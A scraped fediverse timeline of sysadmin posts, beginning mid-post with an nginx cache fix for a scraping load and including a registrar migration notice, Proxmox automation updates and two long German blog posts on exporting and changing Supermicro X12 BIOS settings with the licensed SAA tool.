                                        Check it before trusting it and always test the config for typos `sudo nginx -t` before restarting and crashing your services. Real Bearer tokens still 200, anonymous browsing still 200, POST /inbox still reaches Mastodon, and preview bots (Mastodon, Slack, Discord, Telegram, WhatsApp, facebookexternalhit) all still 200. Load went from 26 to normal (under 6 usually for our busy server) and CPU idle from 1.4 percent to 34 percent.

                                        What actually identified this as automated was not request volume, which looks like normal browsing. In 57 minutes that one range fetched 1722 distinct hashtags. Everyone else on the instance, about a thousand real users plus all federation, fetched 1353. But one IP range went through more hashtags than the entire rest of the server, which is telling.

                                        We now log $upstream_cache_status and $request_time to a separate file, so next time this is a ten second check instead of an hour of guessing.

                                        If your instance feels slow and your database is idle, check your cache hit rate before you scale anything.

                                          AodeRelay boosted

                                          [?]BlablaLinux » 🌐
                                          @blablalinux@mastodon.blablalinux.be

                                          [?]Haack’s Networking » 🌐
                                          @oemb1905@gnulinux.social

                                          Some services will be momentarily down today while we migrate from Dynadot to Dreamhost for our domain Registrar. Moving forward, all DNS will be managed at Hurricane Electric and/or Dreamhost. Thanks for patience 🙏🏼

                                          This sudden change was due to Dynadot changing their subdomain record policy from 250 to 50 without notice. This caused a week-long disruption in building out new services due to any record over the cap being irrecoverable once deleted and new ones being impossible to create. Despite having 150+ records in the past, Dynadot responded that they've never supported more than 150 and would only restore that.

                                          Both the change in terms and contract without notice and the dishonesty once a ticket was filed serve as sufficient reasons to ditch Dynadot. This was surprising to say the least. They've been a solid Registrar. As for DNS, we only used it the last three years having originally used afraid.org for over a decade. Ultimately, this is for the best however, because it is always unwise to keep one's DNS and Registrar at the same host. Hurricane Electric's DNS is additionally a breath of fresh air from 1998-2002 era and so easy to use - the alphabetical rendering of records amazing 🤩

                                          It's always DNS !!

                                            AodeRelay boosted

                                            [?]BlablaLinux » 🌐
                                            @blablalinux@mastodon.blablalinux.be

                                            📊 La liste complète des conteneurs est visible ici : picsur.blablalinux.be/i/f8bcd8

                                            Un rapide passage à 512 Mo de RAM, et le problème est réglé. C'est aussi ça la magie du monitoring et des scripts auto : repérer les petits goulots d'étranglement en un clin d'œil ! ☕️💪

                                              AodeRelay boosted

                                              [?]BlablaLinux » 🌐
                                              @blablalinux@mastodon.blablalinux.be

                                              C'est samedi, jour de l'automatisation sur le cluster Proxmox ! ⚙️
                                              La première tâche s'est lancée à 10h pile et s'est terminée 11 minutes plus tard : 3 VM mises à jour en douceur (PBS, Elasticsearch et Jitsi Meet, bien identifiables en bleu sur la capture) et aucun redémarrage nécessaire. Tout roule tout seul pendant que je peux profiter de mon café ! ☕️
                                              Et chez vous, ça automatise aussi le week-end ou c'est tout à la main ? 🛠️

                                                [?]:awesome:🐦‍🔥nemo™🐦‍⬛ 🇺🇦🍉 » 🌐
                                                @nemo@mas.to

                                                @mboelen "A 's Translator (ROSETTA STONE) OR What do they call that in this world?"

                                                bhami.com/rosetta.html

                                                Advice for upcomming =/= tho very close xD

                                                  Joachim boosted

                                                  [?]Michał "rysiek" Woźniak · 🇺🇦 » 🌐
                                                  @rysiek@mstdn.social

                                                  Joachim boosted

                                                  [?]Michał "rysiek" Woźniak · 🇺🇦 » 🌐
                                                  @rysiek@mstdn.social

                                                  [?]Julian Oliver » 🌐
                                                  @JulianOliver@mastodon.social

                                                  In less than 12hrs I'll be taking graduates of the Tunnel training into another edition of Fortress. 4x6hrs, followed by 2 weeks of supported service deployments and experimentation.

                                                  I'm excited about every part of it (esp to see what participants build up), except the 1am starts, in my, umm, challenging timezone.

                                                  It'll be coffee black as midnight for a bit.

                                                  courses.nikau.io/fortress/

                                                    AodeRelay boosted

                                                    [?]Pete Orrall [Pete/Pete] » 🌐
                                                    @peteorrall@mastodon.bsd.cafe

                                                    @mwl That one sentence accurately describes the life of a . 🤣

                                                      [?]Michał "rysiek" Woźniak · 🇺🇦 » 🌐
                                                      @rysiek@mstdn.social

                                                      Anybody any news on DNS-PERSIST-01? It would allow me to simplify some things massively, once it's available…
                                                      letsencrypt.org/2026/02/18/dns

                                                        AodeRelay boosted

                                                        [?]Crafty Gardener NZ » 🌐
                                                        @craftygardennz@mastodon.nz

                                                        Hi everyone, my husband Craig is currently looking for a new job. Please feel free to boost this post for me 💐

                                                        "I'm open for sysadmin, devops, SRE, or general coding work, at any level. Prefer to work *with* opensource, and in an ideal world *on* opensource, but work is work. Nearly 3 decades of experience across development and systems, from the tiny to the large (most recently GitLab). Permanent or contract is fine, working (remote) from Dunedin."

                                                        CV at stroppykitten.com/static/Craig

                                                        Email: craig@stroppykitten.com

                                                          Alexandre :freebsd: boosted

                                                          [?]Stefano Marinelli » 🌐
                                                          @stefano@mastodon.bsd.cafe

                                                          There is a person I've been helping for a while who runs two instances, one and one .

                                                          Yesterday, they suffered severe file system corruption on their device, and I lent them a hand with the recovery. For GoToSocial, they restored the DB from the previous backup and got it running again. For snac, although a few files were lost, no action was necessary... it just started back up and did what it had to do, bringing the instance back to full operation.

                                                          This goes to show that when software is well-designed and intentionally kept simple, it's also easier to get back up and running when something goes wrong. In this case, snac's "files-only" approach demonstrated excellent resilience.

                                                          Thanks, @grunfink !

                                                            [?]rdm » 🌐
                                                            @rdm@aus.social

                                                            Sysadmin life existential edition [SENSITIVE CONTENT]

                                                            We've just had someone in another team create a host called "something".

                                                            We are yet to identify the responsible user, so for now it is someone's something.

                                                            And something is reporting an error in our monitoring dashboard. So something is wrong with something for someone.

                                                              AodeRelay boosted

                                                              [?]-=Kernel-Error=- » 🌐
                                                              @kernel-error.de@www.kernel-error.de

                                                              Sieben Einstellungen, kein Setup-Besuch: die BIOS-Konfiguration meines Supermicro-Boards ändern

                                                              Im letzten Beitrag habe ich die BIOS-Konfiguration meines Boards als XML-Datei ausgelesen. Lesen ist die eine Hälfte. Diesmal schreibe ich zurück: sieben Einstellungen, ohne den Rechner auch nur einmal ins Setup zu booten. Warum ich genau diese sieben genommen habe, welche vier ich bewusst in Ruhe gelassen habe, drei Fallstricke, die mich Zeit gekostet haben, und die Frage, ob es dafür nicht einfach eine grafische Oberfläche gibt. [SENSITIVE CONTENT]

                                                              Im letzten Beitrag ging es darum, die BIOS-Einstellungen meines Supermicro X12SPi-TF überhaupt erst als Datei in die Hand zu bekommen. Das Ergebnis war eine XML mit 372 Einstellungen, und der Weg dorthin führte über eine Lizenz für 28,17 Euro.

                                                              Damit war die halbe Arbeit getan. Eine Konfiguration auslesen zu können ist schön, aber der eigentliche Gewinn liegt darin, sie auch zurückschreiben zu können. Genau das habe ich jetzt gemacht, und zwar zum ersten Mal überhaupt an dieser Maschine: sieben Einstellungen geändert, ohne den Rechner ins Setup zu booten, ohne Tastatur, ohne die Fernkonsole des Management-Controllers.

                                                              Vorweg die gute Nachricht für alle, die schon rechnen: die kleine Lizenz deckt das Schreiben mit ab. Ich hatte damit gerechnet, dass Supermicro genau an dieser Stelle noch einmal die Hand aufhält, und das tut es auch, aber nur an einer sehr kleinen Ecke. Von den 372 Einstellungen tragen 21 den Vermerk, dass sie die große Lizenz verlangen. Es sind ausschliesslich Zertifikatseinträge für KMIP-Server und HTTPS-Boot. Nichts davon betrifft normale Setup-Optionen.

                                                              Was ich ändern wollte, und warum

                                                              Der langweiligste Teil eines solchen Artikels ist die Liste der geänderten Werte. Der interessante Teil ist die Begründung, deshalb fange ich damit an.

                                                              Mein Rechner bootet von einer NVMe-SSD. Er hat das noch nie anders gemacht und wird es auch nicht. Trotzdem lädt das BIOS bei jedem Start die Pre-Boot-Netzwerktreiber für vier Netzwerkanschlüsse, jeweils für IPv4 und IPv6, und baut daraus Boot-Einträge, die niemand benutzt. Dazu kommen die Option-ROMs von drei leeren Steckplätzen.

                                                              Ein Option-ROM ist ein kleines Stück Firmware auf einer Steckkarte, das beim Start ins BIOS geladen wird, damit die Karte schon vor dem Betriebssystem funktioniert. Für eine Netzwerkkarte heisst das Netzwerk-Boot, für einen Speichercontroller das Booten von daran angeschlossenen Platten. Wer von keinem dieser Geräte bootet, braucht den Code nicht.

                                                              Also:

                                                              Network Stack von *Enabled* auf *Disabled*. Damit fällt die komplette UEFI-Netzwerkinitialisierung weg. – Onboard LAN1 Option ROM aus. Der Pre-Boot-Treiber der onboard X550 wird nicht gebraucht. – CPU SLOT6 OPROM aus. Dort steckt meine X710. Dazu gleich mehr, das ist der eigentliche Grund für die Aktion. – CPU SLOT1, SLOT2 und SLOT7 OPROM aus. Alle drei Steckplätze sind leer.

                                                              Bei den drei leeren Steckplätzen bin ich ehrlich: der Zeitgewinn ist exakt null. Wo keine Karte steckt, gibt es auch kein Option-ROM zu laden. Ich habe sie trotzdem mitgenommen, weil ich einen dokumentierten Sollzustand haben will und nicht eine Mischung aus bewusst gesetzt und zufällig übrig.

                                                              Die siebte Änderung ist die, um die es mir wirklich ging.

                                                              Die eine Zeile, die eine Woche Rätselraten beendet hat

                                                              Beim Schreiben meiner BIOS-Serie ist mir etwas aufgefallen, das ich mir lange nicht erklären konnte. Mein Prozessor ist ein Xeon Gold 5315Y, Ice Lake-SP. Diese Generation beherrscht Hardware P-States, kurz HWP. Die CPU regelt ihren Takt dabei selbst, in feineren Stufen und deutlich schneller, als das Betriebssystem es könnte.

                                                              Nur meldete mein Kernel davon nichts. In /proc/cpuinfo fehlte das hwp-Flag, der Treiber intel_pstate lief im passiven Modus, und die Taktregelung machte der Governor schedutil. Also genau der Zustand, den man auf einer CPU erwartet, die HWP gar nicht kann.

                                                              Ich habe eine Weile in Richtung Kernel gesucht. Das war die falsche Richtung. Der Schalter sass im BIOS, ziemlich tief vergraben:

                                                              Advanced > CPU Configuration > Advanced Power Management Configuration
                                                                      > Hardware PM State Control > Hardware P-States   [Disable]

                                                              Der Auslieferungszustand dieser Option ist tatsächlich *Disable*. Es gibt vier Werte, und der Hilfetext im BIOS beschreibt sie so:

                                                              Disable                              hardware will choose a P-state setting for
                                                                                                   the system based on an OS request
                                                              Native Mode                          hardware will choose a P-state setting
                                                                                                   based on OS guidance
                                                              Native Mode with No Legacy Support   hardware will choose a P-state setting
                                                                                                   independently without OS guidance
                                                              Out of Band Mode                     hardware autonomously choose a P-state
                                                                                                   without OS guidance

                                                              Ich habe Native Mode genommen, also die zahmste der drei aktiven Varianten. Der Unterschied zu den beiden anderen ist wichtig: bei *Native Mode* behält das Betriebssystem seinen Einfluss, es wandert nur die Feinsteuerung in die CPU. Bei den beiden anderen wird der Kernel bei der Taktwahl übergangen, und dann kann er dir auch nicht mehr sinnvoll sagen, was die CPU gerade tut.

                                                              Was ich bewusst nicht angefasst habe

                                                              Diese Liste finde ich wichtiger als die Liste der Änderungen, denn hier hätte ich mir den Rechner unbedienbar machen können.

                                                              Das Option-ROM von SLOT4 bleibt an. Dort sitzt die Grafikkarte. Ihr GOP-Modul ist das, was beim Start überhaupt ein Bild auf den Monitor bringt. Wer es abschaltet, sitzt bis zum Laden des Grafiktreibers im Dunkeln, und wenn dabei etwas schiefgeht, sitzt er dauerhaft im Dunkeln.

                                                              Onboard Video Option ROM bleibt an. Das ist die Grafik des Management-Controllers, und daran hängt die Fernkonsole. Schaltet man sie ab, bleibt beim Start das Fenster schwarz, über das man aus der Ferne ins Setup kommt. Das ist genau der Rettungsweg, den man sich nicht abschneiden will, wenn man gerade anfängt, das BIOS aus dem laufenden Betrieb heraus umzukonfigurieren.

                                                              Beide NVMe-Option-ROMs bleiben an. Das erste trägt das Betriebssystem. Auf das zweite soll irgendwann Windows, und auch wenn der Bootloader auf der ersten Platte das Kommando behält, muss die zweite dem Firmware-Bootmanager sichtbar bleiben.

                                                              Legacy USB Support bleibt an. Hier hätte ich vermutlich etwas Startzeit gewinnen können. Ich habe es gelassen, weil ich den Gewinn nicht gemessen habe und das Risiko eine tote Tastatur im Setup wäre. Eine Einstellung, deren Nutzen man nicht beziffern kann, deren Schaden aber konkret ist, ändert man nicht.

                                                              Der Weg: eine Teildatei, nicht die ganze

                                                              Naheliegend wäre, die ausgelesene XML zu bearbeiten und komplett zurückzuschreiben. Bei 372 Einstellungen und 260 Kilobyte ist das unnötig riskant, und es ist auch nicht der vorgesehene Weg.

                                                              Das Werkzeug kennt einen Filter, der genau die Einstellungen ausgibt, die vom Auslieferungszustand abweichen:

                                                              ./saa -c GetCurrentBiosCfg --file nondefault.xml --overwrite --filter nondefault

                                                              Heraus kommt eine kleine Datei mit derselben Struktur wie die grosse, nur eben mit den Menüzweigen, die auch wirklich etwas enthalten. Und genau diese Struktur nimmt das Schreibkommando entgegen. Teildateien sind also kein Trick, sondern der normale Betriebsfall.

                                                              Hier der erste Fallstrick, und der hat mich ehrlich geärgert: die eingebaute Hilfe des Werkzeugs beschreibt den Filter als Ziffer.

                                                              --filter    Sets filter type to: 1 = nondefault

                                                              Die Ziffer 1 wird abgewiesen. Das Kommando bricht ab und wirft den Hilfetext aus, der einem gerade die Ziffer empfohlen hat. Akzeptiert wird ausschliesslich das ausgeschriebene Wort nondefault. Wenn du also an dieser Stelle hängst, liegt es nicht an dir.

                                                              Meine Änderungsdatei habe ich nicht getippt, sondern mit einem kleinen Python-Skript aus dem Auslesestand erzeugt. Das klingt nach Übertreibung für sieben Werte, hat aber einen handfesten Grund: die Einstellungen müssen im richtigen Menüzweig stehen, und die Menünamen sind lang und fehleranfällig. CPU SLOT2 PCI-E 4.0 X8(IN X16) OPROM vertippt sich schneller, als man denkt, und ein Tippfehler im Namen führt nicht zu einer Fehlermeldung, sondern dazu, dass die Einstellung stillschweigend nicht gesetzt wird.

                                                              Das Schreiben selbst ist unspektakulär:

                                                              ./saa -c ChangeBiosCfg --file change-boot-oprom-hwp.xml
                                                              
                                                              Status: The BIOS configuration is updated for the managed system
                                                              Note: You have to reboot or power up the system for the changes to take effect.

                                                              Es gibt eine Option --reboot, die den Neustart gleich mit erledigt. Die habe ich weggelassen. Wann ein Rechner neu startet, entscheide ich lieber selbst.

                                                              Der zweite Fallstrick, und der ist gemein

                                                              Nach dem Schreiben will man natürlich nachsehen, ob es geklappt hat. Also dasselbe Auslesekommando noch einmal, und dann steht da:

                                                              Hardware P-States              = Disable     (geschrieben: Native Mode)
                                                              Network Stack                  = Enabled     (geschrieben: Disabled)
                                                              CPU SLOT6 PCI-E 4.0 X16 OPROM  = EFI         (geschrieben: Disabled)

                                                              Nichts. Alle alten Werte, unverändert.

                                                              Der erste Reflex ist, das Schreibkommando noch einmal laufen zu lassen. Tu das nicht. Das Auslesen liefert die aktive Konfiguration, und die ändert sich erst beim nächsten Start. Deine Änderung liegt so lange in einem Bereich, den das Werkzeug nicht anzeigt. Zwischen dem Schreiben und dem Neustart gibt es damit keine Möglichkeit, die Änderung zu überprüfen, ausser dem Rückgabewert des Kommandos.

                                                              Das ist unschön, aber es ist logisch. Die Einstellungen werden erst beim Start aus dem Speicher gelesen, und vorher gibt es schlicht nichts Aktives, das anders wäre.

                                                              Nach dem Neustart

                                                              Und dann stimmt alles. Die Zahl der Abweichungen vom Auslieferungszustand ist von sechs auf dreizehn gestiegen, also genau um meine sieben:

                                                              Quiet Boot                            Unchecked
                                                              Restore on AC Power Loss              Stay Off
                                                              Power Button Function                 4 Seconds Override
                                                              Hardware P-States                     Native Mode
                                                              Network Stack                         Disabled
                                                              Re-Size BAR Support                   Enabled
                                                              VGA Priority                          Offboard
                                                              CPU SLOT1 PCI-E 4.0 X8 OPROM          Disabled
                                                              CPU SLOT2 PCI-E 4.0 X8(IN X16) OPROM  Disabled
                                                              CPU SLOT6 PCI-E 4.0 X16 OPROM         Disabled
                                                              CPU SLOT7 PCI-E 4.0 X8 OPROM          Disabled
                                                              Onboard LAN1 Option ROM               Disabled
                                                              WHEA Support                          Disabled

                                                              Die Netzwerk-Booteinträge sind verschwunden, übrig bleibt der Bootloader und die eingebaute Shell:

                                                              BootCurrent: 000F
                                                              BootOrder: 000F,0001
                                                              Boot0001* UEFI: Built-in EFI Shell
                                                              Boot000F* ubuntu

                                                              Und der Punkt, um den es mir ging, ist eingetreten. Der Prozessor meldet jetzt Fähigkeiten, die er die ganze Zeit hatte:

                                                              $ grep -o ' hwp[_a-z]*' /proc/cpuinfo | sort -u
                                                               hwp
                                                               hwp_act_window
                                                               hwp_epp
                                                               hwp_pkg_req
                                                              
                                                              $ cat /sys/devices/system/cpu/intel_pstate/status
                                                              active

                                                              Der Treiber ist damit vom passiven in den aktiven Modus gewechselt. Was dabei kurz irritiert: der Governor heisst jetzt powersave statt schedutil, und das sieht nach einem Rückschritt aus. Ist es nicht. Bei intel_pstate im aktiven Modus ist powersave der Name für den Betrieb, bei dem die Hardware regelt. Wie sie das tut, steuert ein separater Wert:

                                                              $ cat /sys/devices/system/cpu/cpu0/cpufreq/energy_performance_preference
                                                              balance_performance

                                                              Die CPU geht im Leerlauf auf 800 MHz und hat den vollen Turbo bis 3600 MHz zur Verfügung. Genau so soll es sein.

                                                              Wichtig war mir noch die Gegenprobe, dass ich mir das Netzwerk nicht zerschossen habe. Die Karte, deren Option-ROM ich abgeschaltet habe, ist schliesslich die, über die diese Maschine am Netz hängt:

                                                              $ ethtool ens6f1np1 | grep -E 'Speed|Link detected'
                                                              	Speed: 10000Mb/s
                                                              	Link detected: yes

                                                              Unverändert. Das ist auch zu erwarten, denn der Treiber im laufenden Betrieb kommt aus dem Kernel und hat mit dem Option-ROM nichts zu tun. Das Option-ROM ist reiner Startcode. Trotzdem ist das der Punkt, an dem die meisten zögern, deshalb steht die Messung hier.

                                                              Ein Punkt ist noch offen, und den will ich nicht verschweigen: der ursprüngliche Anlass für das Abschalten von SLOT6 war eine Meldung auf der Treiberstatus-Seite im Setup, wo meine Netzwerkkarte seit einem Firmware-Update als *Failed* geführt wird. Ob die Meldung jetzt weg ist, kann ich von aussen nicht sehen. Das prüfe ich beim nächsten Setup-Besuch nach.

                                                              Gibt es dafür keine Oberfläche?

                                                              Diese Frage lag für mich die ganze Zeit im Raum, und die Antwort ist unbefriedigend.

                                                              Es gäbe einen herstellerneutralen Weg unter Linux. Der Kernel kennt eine Geräteklasse namens firmware-attributes, über die sich BIOS-Einstellungen als ganz normale Dateien lesen und schreiben lassen. Der Firmware-Updater fwupd kann das seit Version 1.8.4 direkt bedienen. Das wäre die Lösung: ein Kommando, egal welcher Hersteller.

                                                              Auf meiner Maschine sieht das so aus:

                                                              $ ls /sys/class/firmware-attributes/
                                                              ls: cannot access '/sys/class/firmware-attributes/': No such file or directory
                                                              
                                                              $ fwupdmgr get-bios-setting
                                                              This system doesn't support firmware settings

                                                              Das Hilfsmodul dafür liegt im Kernel, es ist also nicht so, dass die Infrastruktur fehlen würde:

                                                              /lib/modules/7.0.0-28-generic/kernel/drivers/platform/x86/firmware_attributes_class.ko.zst

                                                              Was fehlt, ist der Treiber des Herstellers. Der Kernel bringt genau drei mit:

                                                              drivers/platform/x86/dell/dell-wmi-sysman     Dell
                                                              drivers/platform/x86/lenovo/think-lmi         Lenovo
                                                              drivers/platform/x86/hp/hp-bioscfg            HP

                                                              Supermicro ist nicht dabei. Statt eines Treibers, der diese Kernel-Schnittstelle bedient, gibt es ein eigenes Werkzeug und eine Lizenz. Auf einem Dell oder Lenovo wäre der Inhalt dieses Beitrags ein Einzeiler ohne Zusatzkosten.

                                                              Ganz ohne Oberfläche ist man aber nicht. Das Werkzeug bringt einen textbasierten Editor mit, der das Setup im Terminal nachbaut:

                                                              ./saa -c GetCurrentBiosCfg --tui

                                                              Dazu gibt es --compact, das anschliessend nur die geänderten Zeilen herausschreibt. Über eine SSH-Pipe blieb das Fenster bei mir schwarz, es braucht ein echtes Terminal. Ausprobiert habe ich es deshalb noch nicht richtig. Und es gibt das Werkzeug ausserdem als Windows-Version und als Variante für die UEFI-Shell, also für den Fall, dass überhaupt kein Betriebssystem installiert ist.

                                                              Eine echte grafische Oberfläche gibt es auch, sie heisst SSM. Die will dann allerdings wieder die grosse Lizenz.

                                                              Zurück auf Anfang

                                                              Das Wichtigste zum Schluss, und man legt es sich besser vorher zurecht als hinterher. Vor dem Schreiben habe ich den vollständigen Stand weggesichert. Der Rückweg ist dann dasselbe Kommando mit dieser Datei:

                                                              ./saa -c ChangeBiosCfg --file bios-current-2026-08-09.xml

                                                              Als Notnagel gibt es darunter noch LoadDefaultBiosCfg, das alles auf den Auslieferungszustand zurücksetzt. Das ist aber ein grober Hebel: es wirft auch die sechs Abweichungen weg, die ich absichtlich eingestellt habe, und die stehen dann eben nicht mehr so, wie ich sie haben will. Die Teildatei ist der bessere Weg, der Vollreset die letzte Reserve.

                                                              Und weil es hier um Firmware geht, der offensichtliche Hinweis: bei einem Rechner, an den du nicht rankommst, änderst du keine Boot-Einstellungen, ohne dass jemand vor Ort ist oder die Fernkonsole zuverlässig läuft. Ich habe das Option-ROM der Grafik und das des Management-Controllers genau deshalb nicht angefasst.

                                                              Was bleibt

                                                              Sieben Einstellungen, ein Neustart, kein Setup-Besuch. Das klingt nach wenig, ändert aber die Arbeitsweise. BIOS-Einstellungen waren für mich bisher etwas, das man beim Aufbau einmal einstellt und danach ungern anfasst, weil jede Änderung einen Neustart mit Tastatur und Monitor bedeutet. Jetzt sind sie eine Datei, die ich versionieren, vergleichen und zurückspielen kann.

                                                              Der schönste Nebeneffekt war die Sache mit den Hardware P-States. Ich hatte das Verhalten meiner CPU wochenlang für eine Eigenheit des Kernels gehalten und in die falsche Richtung gesucht. Es war eine einzige Zeile in einem Menü, das vier Ebenen tief liegt und das ich beim Durchklicken nie geöffnet hatte. Eine durchsuchbare Datei aller 372 Einstellungen hätte mir das in dreissig Sekunden gezeigt.

                                                              Falls du auf demselben Board sitzt: das Auslesen ist der Beitrag davor, das Schreiben braucht keine weitere Lizenz, und die drei Stolperstellen sind der Filter, der nur als Wort funktioniert, die Gegenprobe, die vor dem Neustart nichts zeigt, und die Versuchung, mehr auf einmal zu ändern, als man beim nächsten Start noch reparieren kann.

                                                              Siehe auch: Achtundzwanzig Euro für eine Textdatei: die BIOS-Konfiguration meines Supermicro-Boards auslesen und die Serie BIOS erklärt.

                                                              Wenn dazu etwas unklar ist oder du es auf deinem Board anders erlebt hast, dürft ihr mich sehr gerne fragen.

                                                              AodeRelay boosted

                                                              [?]-=Kernel-Error=- » 🌐
                                                              @kernel-error.de@www.kernel-error.de

                                                              Achtundzwanzig Euro für eine Textdatei: die BIOS-Konfiguration meines Supermicro-Boards auslesen

                                                              Mein Serverboard hat 372 Einstellungen im Setup. Ich wollte sie als Datei haben, nicht als Fotoserie. Drei Wege dorthin waren verschlossen, alle drei mit derselben Begründung. Diese Begründung nannte den Preis, und der lag bei 28,17 Euro. Was ich dafür bekommen habe, was weiterhin gesperrt bleibt, und warum ich vorher eine falsche Schlussfolgerung gezogen hatte. [SENSITIVE CONTENT]

                                                              In meiner Serie BIOS erklärt arbeite ich mich durch das Setup eines Supermicro X12SPi-TF. Die Grundlage dafür war bisher eine Bildschirmaufnahme: ich bin durch alle Menüs gelaufen, habe das Video in Einzelbilder zerlegt und die Werte abgetippt. Das funktioniert, ist aber Handarbeit, und Handarbeit übersieht Dinge.

                                                              Was ich eigentlich wollte, ist eine Datei. Eine Liste aller Optionen mit ihrem aktuellen Wert, maschinenlesbar, damit ich sie durchsuchen und mit einem späteren Stand vergleichen kann. Das Board kann das. Es rückt es nur nicht heraus.

                                                              Drei Wege, drei Absagen

                                                              Der erste Weg führt über Redfish, die HTTP-Schnittstelle des Management-Controllers. Der passende Endpunkt existiert, antwortet aber nicht mit Daten:

                                                              GET /redfish/v1/Systems/1/Bios
                                                              HTTP 403
                                                              
                                                              "MessageId": "SMC.1.0.OemLicenseNotPassed",
                                                              "Message": "Not licensed to perform this request. The following licenses DCMS were needed"

                                                              Der zweite Weg ist Supermicros eigenes Kommandozeilenwerkzeug. Es heißt inzwischen SAA, SuperServer Automation Assistant, und liegt dem BIOS-Paket bei. Es kann genau das, was ich suche, und arbeitet dabei nicht über das Netz, sondern direkt über die Firmware:

                                                              ./saa -c GetCurrentBiosCfg --file bios-current.xml
                                                              ExitCode 80
                                                              Node product key is not activated.
                                                              One of the node product key (SFT-OOB-LIC or SFT-DCMS-SINGLE) should be activated

                                                              Der dritte Weg wäre, die UEFI-Variablen selbst zu lesen. Die liegen unter /sys/firmware/efi/efivars/, und tatsächlich gibt es dort Einträge, die nach BIOS-Einstellungen aussehen. Nur sind das undurchsichtige Datenblöcke ohne die Zuordnungstabelle des Boards. Man sieht Bytes, aber man weiß nicht, welches Byte welcher Menüpunkt ist.

                                                              Drei unabhängige Wege, dieselbe Sperre. An dieser Stelle habe ich in meinen Notizen etwas geschrieben, das sich später als falsch herausstellte. Dazu komme ich am Ende.

                                                              Zwei Lizenzen, und sie sind nicht dasselbe

                                                              Lies die beiden Fehlermeldungen oben noch einmal nebeneinander. Sie verlangen nicht das Gleiche. Redfish nennt namentlich DCMS. SAA nennt SFT-OOB-LIC oder SFT-DCMS-SINGLE, also eine von zweien.

                                                              Das ist der Punkt, an dem man leicht zu viel Geld ausgibt. Supermicro verkauft für diese Board-Generation zwei Lizenzen. Die kleine heißt Out of Band, kurz OOB. Die große heißt DCMS und kostet etwa das Fünffache. Wer nur die Fehlermeldung von Redfish liest, kauft DCMS. Wer die Fehlermeldung von SAA liest, merkt, dass es für seinen Zweck auch die kleine tut.

                                                              Nebenbei taucht dieselbe Lizenz an einer Stelle auf, die ich nicht erwartet hätte. Im Handbuch zum Board stehen bei zwei Sicherheitseinstellungen, nämlich beim Abschalten der vorderen und der hinteren USB-Anschlüsse, die Worte *available for configuration if the SFT-DCMS-SINGLE license is installed*. Es fehlen also nicht nur Management-Schnittstellen. Es fehlen zwei Menüpunkte im Setup selbst.

                                                              Warum man den Schlüssel nicht selbst baut

                                                              Bei dieser Recherche stößt man unweigerlich auf ein Werkzeug auf GitHub, das Supermicro- Produktschlüssel behandelt. Für die Generationen 9 bis 11 kann es welche erzeugen, denn dort war der Schlüssel ein berechneter Wert über die MAC-Adresse des Management-Controllers.

                                                              Für die zwölfte Generation, also mein Board, kann es das nicht, und das Projekt schreibt es selbst deutlich hin: dieses Format lässt sich mit dem Werkzeug prüfen, aber nicht erzeugen. Der Grund ist, dass Supermicro umgestellt hat. Der Schlüssel ist heute eine von Supermicro signierte Datei, und der Management-Controller prüft die Signatur gegen einen öffentlichen Schlüssel in seiner eigenen Firmware. Ohne den privaten Schlüssel des Herstellers entsteht da nichts Gültiges.

                                                              Mein Board bestätigt das Format auf Nachfrage:

                                                              Node Product Key Format..........JSON

                                                              Damit ist die naheliegende Abkürzung nicht moralisch, sondern rechnerisch verschlossen. Man muss die Frage also wirklich beantworten.

                                                              Der Kauf, und eine Überraschung beim Erzeugen

                                                              Gekauft habe ich im Supermicro eStore. 23,67 Euro netto, 28,17 Euro brutto. Bei der Bestellung wählt man das Mainboard-Modell aus einer Liste, und mein X12SPi-TF steht darin. Das ist erwähnenswert, weil mehrere Händlerbeschreibungen dieser Lizenz nur X10 und X11 nennen. Diese Texte sind veraltet.

                                                              Jetzt kommt der Teil, den ich falsch erwartet hatte. Ich dachte, ich kaufe und bekomme einen Schlüssel. So läuft es nicht. Man bekommt zunächst nur eine Zertifikatsnummer und die Aufforderung, den Schlüssel selbst zu erzeugen. Dafür meldet man sich im Store an, wählt die Bestellung aus und gibt an, für welches Gerät der Schlüssel gelten soll: entweder die MAC-Adresse des Management-Controllers oder die Seriennummer des Boards.

                                                              Die Bindung an die Hardware entsteht also nicht beim Verkauf, sondern beim Käufer, im Moment des Erzeugens. Das ist konsequent, denn Supermicro weiß beim Verkauf ja gar nicht, in welchem Gerät die Lizenz landen soll. Es heißt aber auch, dass man sich vertippen kann, und dann hat man einen Schlüssel für ein Gerät, das es nicht gibt.

                                                              Der Ablauf war zügig. Bestellbestätigung um 14:17, die Freigabe zum Erzeugen um 14:42, der fertige Schlüssel um 14:44, aktiv im Board um 14:46. Unter einer halben Stunde vom Klick bis zur Funktion, und die zugesagte Stunde war damit nicht zu optimistisch.

                                                              Der Schlüssel selbst ist eine kleine Textdatei, benannt nach der MAC-Adresse, mit einem JSON-Objekt darin: Lizenzname, Ausstellungsdatum und eine lange Signatur. Mehr ist es nicht.

                                                              Eine Kuriosität am Rande: die Mail mit dieser Textdatei trägt einen Ausfuhrhinweis der US-Regierung. Die Ware sei nur für das Bestimmungsland freigegeben und dürfe nicht weiterveräußert oder an Dritte weitergegeben werden. Das gilt hier für eine Datei von wenigen hundert Byte, deren einzige Wirkung darin besteht, in einem Verwaltungscontroller einen Menüpunkt sichtbar zu machen.

                                                              Aktivieren

                                                              Supermicro nennt vier Wege, den Schlüssel einzuspielen: die Weboberfläche des Management-Controllers, das Werkzeug SUM, die Verwaltungssoftware SSM und Redfish. Die Weboberfläche ist der ruhigste Weg, weil sie eine Bestätigungsseite hat, und bei einem Schlüssel, der genau einmal auf genau ein Gerät passt, will man die haben.

                                                              Wer es lieber skriptet, findet die passenden Endpunkte im Management-Controller, und die sind auch ohne Lizenz erreichbar:

                                                              POST /redfish/v1/Managers/1/LicenseManager/Actions/LicenseManager.ActivateLicense
                                                              POST /redfish/v1/Managers/1/LicenseManager/Actions/LicenseManager.ClearLicense
                                                              GET  /redfish/v1/Managers/1/LicenseManager/QueryLicense

                                                              Die Abfrage danach gibt genau den Inhalt der Datei zurück, die man hochgeladen hat. Der Controller speichert den Schlüssel also unverändert und prüft ihn bei Bedarf.

                                                              Das Kommando, auf das es ankommt

                                                              Nach der Aktivierung meldet SAA einen anderen Zustand:

                                                              Node Product Key Activated.......SFT-OOB-LIC
                                                              Feature Toggled On...............Yes
                                                              BMC Supports OOB BIOS Config.....Yes
                                                              BIOS Supports OOB BIOS Config....Yes

                                                              Und dasselbe Kommando, das vorher mit ExitCode 80 abgebrochen ist, läuft durch:

                                                              ./saa -c GetCurrentBiosCfg --file bios-current.xml
                                                              File "bios-current.xml" is created.

